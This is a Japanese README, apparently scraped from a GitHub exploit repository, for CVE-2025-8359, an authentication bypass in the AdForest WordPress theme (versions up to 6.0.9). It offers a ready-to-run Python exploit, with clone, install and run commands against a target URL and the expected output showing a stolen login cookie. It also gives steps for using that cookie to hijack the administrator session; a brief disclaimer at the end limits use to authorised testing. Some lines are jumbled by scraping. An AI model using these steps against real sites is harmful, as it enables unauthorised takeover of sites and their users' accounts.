
AdForest <= 6.0.9 - 管理者への認証バイパス
AdForest <= 6.0.9 - 管理者への認証バイパス
リポジトリ: Nxploited/CVE-2025-8359
エクスプロイトスクリプト:CVE-2025-8359.py
CVE: CVE-2025-8359
脆弱性タイプ: 認証バイパス
影響を受ける製品: AdForest - Classified Ads WordPress Theme
影響を受けるバージョン: 6.0.9まで(6.0.9を含む)
CVSSスコア: 9.8(緊急)
WordPress用テーマAdForestは、6.0.9までの全バージョンにおいて認証バイパスの脆弱性の影響を受けます。
認証時にユーザー本人確認の検証が不適切なため、認証されていない攻撃者は、パスワードを必要とせずに任意のユーザー(管理者を含む)としてログインできます。これにより、AdForestを使用するWordPressサイトが完全に侵害される可能性があります。
このリポジトリには、プロフェッショナルなPythonエクスプロイトスクリプトCVE-2025-8359.pyが含まれています。
このスクリプトはエクスプロイトを自動化し、成功確率を最大化するために、考えられるすべての電話番号形式をインテリジェントにテストします。
任意のユーザー(管理者を含む)として認証し、セッションハイジャックに使用できる有効なWordPressログインCookieを取得できます。
主な機能:
+、スペース、エンコーディングなど)。リポジトリをクローン:
git clone https://github.com/Nxploited/CVE-2025-8359.git
cd CVE-2025-8359
依存関係をインストール:
pip install requests
エクスプロイトスクリプトを実行:
python CVE-2025-8359.py -u "http://target.com/wordpress" -p "+966 555 555 555" -i 1
-u : WordPressインストールのベースURL。-p : 対象ユーザーの電話番号(DBに保存されている形式)。-i : 対象ユーザーID(例: 管理者は1)。-n : 名前の値(オプション、デフォルトは"test")。スクリプトのヘルプを表示:
python CVE-2025-8359.py -h
requestspip install requestsエクスプロイトが成功した場合:
[+] Logged in! Cookie: wordpress_logged_in_xxxxxx=xxxxxxx
対象ユーザーに対する有効なWordPress認証Cookieを取得しています。
すべての形式が失敗した場合:
[-] All variants failed. Try other phone formats or check the database.
エクスプロイトが成功すると、スクリプトは取得した認証Cookieを出力します。
Cookieの使用方法:
wordpress_logged_in_...の値をコピーします。/wp-admin/にアクセスします。エクスプロイトが成功していれば、管理者アクセスが得られます。例(Chrome拡張機能を使用):
wordpress_logged_in_xxxxxxxxxxxxx(スクリプトによって出力された値)このプロジェクトおよびエクスプロイトは、教育および許可を得たペネトレーションテストの目的のみで提供されます。
作者は、このエクスプロイトによって引き起こされた誤用や損害について一切責任を負いません。
システムをテストする前に、必ず適切な許可を取得してください。